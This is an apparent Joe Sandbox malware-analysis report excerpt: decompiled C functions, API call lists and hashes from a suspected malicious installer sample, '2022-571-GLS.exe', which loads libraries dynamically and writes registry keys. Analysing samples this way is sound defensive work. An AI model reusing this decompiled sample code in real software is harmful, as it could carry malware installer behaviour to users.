                          0x004047b2
                          0x004047b7
                          0x004047bf
                          0x004047c0
                          0x004047cd
                          0x004047d5
                          0x004047d6
                          0x004047d8
                          0x004047da
                          0x004047dc
                          0x004047df
                          0x004047df
                          0x004047e6
                          0x004047ec
                          0x004047ec
                          0x004047f3
                          0x004047fa
                          0x004047fd
                          0x00404800
                          0x00404800
                          0x00404804
                          0x00404814
                          0x00404816
                          0x00404819
                          0x004047c2
                          0x004047c2
                          0x004047c9
                          0x004047c9
                          0x00404821
                          0x0040482c
                          0x00404842
                          0x00404852
                          0x0040486e

                          APIs
                          • lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
                          • wsprintfA.USER32 ref: 00404852
                          • SetDlgItemTextA.USER32 ref: 00404865
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s
                          • API String ID: 3540041739-3551169577
                          • Opcode ID: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
                          • Instruction ID: 71df96092b2c0d2c51d4f9b386e12500524326f2c654dceed31374545f8d5b50
                          • Opcode Fuzzy Hash: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
                          • Instruction Fuzzy Hash: C411E77364412437DB0075699C46EAF3299DFC6374F244637FA25F31D2EA788C5285AC
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 51%
                          			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E004029EF(3);
				 *(_t55 + 8) = E004029EF(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A0C(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A0C(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A0C();
					_t28 = E00402A0C();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029EF();
					_t37 = E004029EF();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405C59();
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                          0x00401bb6
                          0x00401bc2
                          0x00401bc5
                          0x00401bce
                          0x00401bce
                          0x00401bd1
                          0x00401bd5
                          0x00401bde
                          0x00401bde
                          0x00401be1
                          0x00401be5
                          0x00401be7
                          0x00401c34
                          0x00401c36
                          0x00401c3f
                          0x00401c47
                          0x00401c4a
                          0x00401c4a
                          0x00401c53
                          0x00000000
                          0x00401be9
                          0x00401bf0
                          0x00401bf2
                          0x00401bfa
                          0x00401bfd
                          0x00401c25
                          0x00401c59
                          0x00401c59
                          0x00401bff
                          0x00401c0d
                          0x00401c15
                          0x00401c18
                          0x00401c18
                          0x00401bfd
                          0x00401c5c
                          0x00401c5f
                          0x00401c65
                          0x00402849
                          0x00402849
                          0x004028a4
                          0x004028b0

                          APIs
                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          • Opcode ID: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
                          • Instruction ID: 0d48d80f5befc11ac34d32cc8383790a8c4c8cfd5038d7f43494ad221661d07c
                          • Opcode Fuzzy Hash: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
                          • Instruction Fuzzy Hash: 4D217471A44248BFEF01AFB4CD8AAAE7B75EF44344F14417AF501B61D1D6788940DB19
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403A17 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00403A17(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405C72(__ecx, "1033");
				while(1) {
					_t26 =  *0x423fc4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423f90; // 0x5bf9f8
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423fc0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423760 = _t18[1];
					 *0x424028 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42375c = _t23;
						E00405C59(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420558, E00405D1D(_t13, _t24, _t26, "djvgroedvnqvwkorzqvn Setup", 0xfffffffe));
						_t11 =  *0x423fac; // 0x3
						_t27 =  *0x423fa8; // 0x5bfba4
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x5bfbbc
								_t11 = E00405D1D(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                          0x00403a1b
                          0x00403a20
                          0x00403a26
                          0x00403a2b
                          0x00403a2b
                          0x00403a33
                          0x00000000
                          0x00000000
                          0x00403a35
                          0x00403a3b
                          0x00403a43
                          0x00403a45
                          0x00403a4b
                          0x00403a4b
                          0x00403a4d
                          0x00403a59
                          0x00000000
                          0x00000000
                          0x00403a5d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403a5f
                          0x00403a64
                          0x00403a6d
                          0x00403a73
                          0x00403a78
                          0x00403a8c
                          0x00403a97
                          0x00403aaf
                          0x00403ab5
                          0x00403aba
                          0x00403ac2
                          0x00403ae3
                          0x00403ae3
                          0x00403ae3
                          0x00403ac4
                          0x00403ac6
                          0x00403ac6
                          0x00403aca
                          0x00403acd
                          0x00403ad1
                          0x00403ad1
                          0x00403ad6
                          0x00403adc
                          0x00403adc
                          0x00000000
                          0x00403ac6
                          0x00403a7a
                          0x00403a7f
                          0x00403a88
                          0x00403a81
                          0x00403a81
                          0x00403a81
                          0x00403a7f

                          APIs
                          • SetWindowTextA.USER32(00000000,djvgroedvnqvwkorzqvn Setup), ref: 00403AAF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: TextWindow
                          • String ID: "C:\Users\user\Desktop\2022-571-GLS.exe"$1033$djvgroedvnqvwkorzqvn Setup
                          • API String ID: 530164218-1406507950
                          • Opcode ID: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
                          • Instruction ID: d2f26ffd722b9fc2ec01e0f6875488dfbe0f51797c7981412bd9696a178e6430
                          • Opcode Fuzzy Hash: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
                          • Instruction Fuzzy Hash: D511D071B00201ABC720EF149C80A373BA8EB85716369813BE841A73A0D73D9A028E58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004057EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004057EE(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                          0x004057ef
                          0x00405806
                          0x0040580e
                          0x0040580e
                          0x00405816

                          APIs
                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057F4
                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057FD
                          • lstrcatA.KERNEL32(?,00409010), ref: 0040580E
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057EE
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2659869361-3081826266
                          • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                          • Instruction ID: a73f37ca2c4469ddb4ae9c1577b37cdaede3e1835012dc8acebf0dfdd4a4e987
                          • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                          • Instruction Fuzzy Hash: 86D0A962615A703EE21236559C09F8B2A0CCF82700B14C833F600B22E2C63C5D41CFFE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401F67 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 59%
                          			E00401F67(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x424038");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x424008 =  *0x424008 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A0C(0xfffffff0);
				 *(_t34 + 8) = E00402A0C(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404FE7(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b050, 0x409000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004036EE(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}








                          0x00401f67
                          0x00401f67
                          0x00401f6c
                          0x00401f73
                          0x0040202f
                          0x0040217a
                          0x0040217a
                          0x004028a1
                          0x004028a4
                          0x004028b0
                          0x004028b0
                          0x00401f82
                          0x00401f8c
                          0x00401f8f
                          0x00401f9e
                          0x00401fa8
                          0x00401fac
                          0x00402028
                          0x00000000
                          0x00402028
                          0x00401fae
                          0x00401fb8
                          0x00401fbc
                          0x00402000
                          0x00401fbe
                          0x00401fc1
                          0x00401fc4
                          0x00401ff4
                          0x00401fc6
                          0x00401fc9
                          0x00401fd2
                          0x00401fd4
                          0x00401fd4
                          0x00401fd2
                          0x00401fc4
                          0x00402008
                          0x0040201d
                          0x0040201d
                          0x00000000
                          0x00402008
                          0x00401f98
                          0x00401f9c
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F92
                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                            • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                            • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA2
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB2
                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                          • String ID:
                          • API String ID: 2987980305-0
                          • Opcode ID: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
                          • Instruction ID: 03d8e5a468c8d4f9f4276292500c9ce54345415f5676ade893a4261965153270
                          • Opcode Fuzzy Hash: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
                          • Instruction Fuzzy Hash: 8E210B32904115BBDF207F65CE8CA6E39B1BF44358F20423BF601B62D0DBBD49419A5E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402319 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 90%
                          			E00402319(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B01(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A0C(2);
				_t18 = E00402A0C(0x11);
				_t31 =  *0x424030 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x424030 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A0C(0x23);
						_t19 = lstrlenA(0x40a450) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029EF(3);
						 *0x40a450 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F2E(_t31,  *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a450, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a450, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x424008 =  *0x424008 +  *(_t37 - 4);
				return 0;
			}










                          0x0040231a
                          0x0040231f
                          0x00402329
                          0x00402333
                          0x00402336
                          0x00402346
                          0x00402350
                          0x00402357
                          0x0040235f
                          0x0040236d
                          0x00402371
                          0x0040237c
                          0x0040237c
                          0x00402380
                          0x00402384
                          0x0040238a
                          0x0040238f
                          0x0040238f
                          0x00402393
                          0x0040239f
                          0x0040239f
                          0x004023b8
                          0x004023ba
                          0x004023ba
                          0x004023bd
                          0x00402493
                          0x00402493
                          0x004028a4
                          0x004028b0

                          APIs
                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402357
                          • lstrlenA.KERNEL32(0040A450,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402377
                          • RegSetValueExA.ADVAPI32(?,?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B0
                          • RegCloseKey.ADVAPI32(?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402493
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: CloseCreateValuelstrlen
                          • String ID:
                          • API String ID: 1356686001-0
                          • Opcode ID: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
                          • Instruction ID: ad8ea78d7240695516c5cd5a42f81e191ab97329ebd365d047bf213c76e9c1da
                          • Opcode Fuzzy Hash: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
                          • Instruction Fuzzy Hash: 14113071E00108BEEB10EFB5DE8DEAF7A79EB40358F10403AF905B61D1D6B85D419A69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b054->lfHeight =  ~(MulDiv(E004029EF(2), _t6, 0x48));
				 *0x40b064 = E004029EF(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b06b = 1;
				 *0x40b068 = _t11 & 0x00000001;
				 *0x40b069 = _t11 & 0x00000002;
				 *0x40b06a = _t11 & 0x00000004;
				E00405D1D(_t18, _t24, _t26, 0x40b070,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b054);
				_push(_t14);
				_push(_t26);
				E00405C59();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                          0x00401d29
                          0x00401d42
                          0x00401d4c
                          0x00401d51
                          0x00401d5c
                          0x00401d63
                          0x00401d75
                          0x00401d7b
                          0x00401d80
                          0x00401d8a
                          0x004024ce
                          0x00401561
                          0x00402849
                          0x004028a4
                          0x004028b0

                          APIs
                          • GetDC.USER32(?), ref: 00401D22
                          • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                          • CreateFontIndirectA.GDI32(0040B054), ref: 00401D8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirect
                          • String ID:
                          • API String ID: 3272661963-0
                          • Opcode ID: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
                          • Instruction ID: c086b606221abe62c4a5ea5e4ce8852375084165fd0064a8092653b5abcc508f
                          • Opcode Fuzzy Hash: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
                          • Instruction Fuzzy Hash: FAF04471A48240AEE70167709E0AB9B3F64D715305F104476B251B62F2C7790444CBAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404F37 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00404F37(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420568 != _t22) {
							 *0x420568 = _t22;
							E00405CFB(0x420580, 0x425000);
							E00405C59(0x425000, _t22);
							E0040140B(6);
							E00405CFB(0x425000, 0x420580);
						}
						L11:
						return CallWindowProcA( *0x420570, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004048B6(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404003(0x413);
				return 0;
			}




                          0x00404f43
                          0x00404f68
                          0x00404f88
                          0x00404f8b
                          0x00404f8e
                          0x00404fa5
                          0x00404fab
                          0x00404fb2
                          0x00404fb9
                          0x00404fc0
                          0x00404fc5
                          0x00404fcb
                          0x00000000
                          0x00404fdb
                          0x00404f75
                          0x00404fc8
                          0x00404fc8
                          0x00000000
                          0x00404fc8
                          0x00404f81
                          0x00404f83
                          0x00000000
                          0x00404f83
                          0x00404f49
                          0x00000000
                          0x00000000
                          0x00404f50
                          0x00000000

                          APIs
                          • IsWindowVisible.USER32(?), ref: 00404F6D
                          • CallWindowProcA.USER32 ref: 00404FDB
                            • Part of subcall function 00404003: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00404015
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID:
                          • API String ID: 3748168415-3916222277
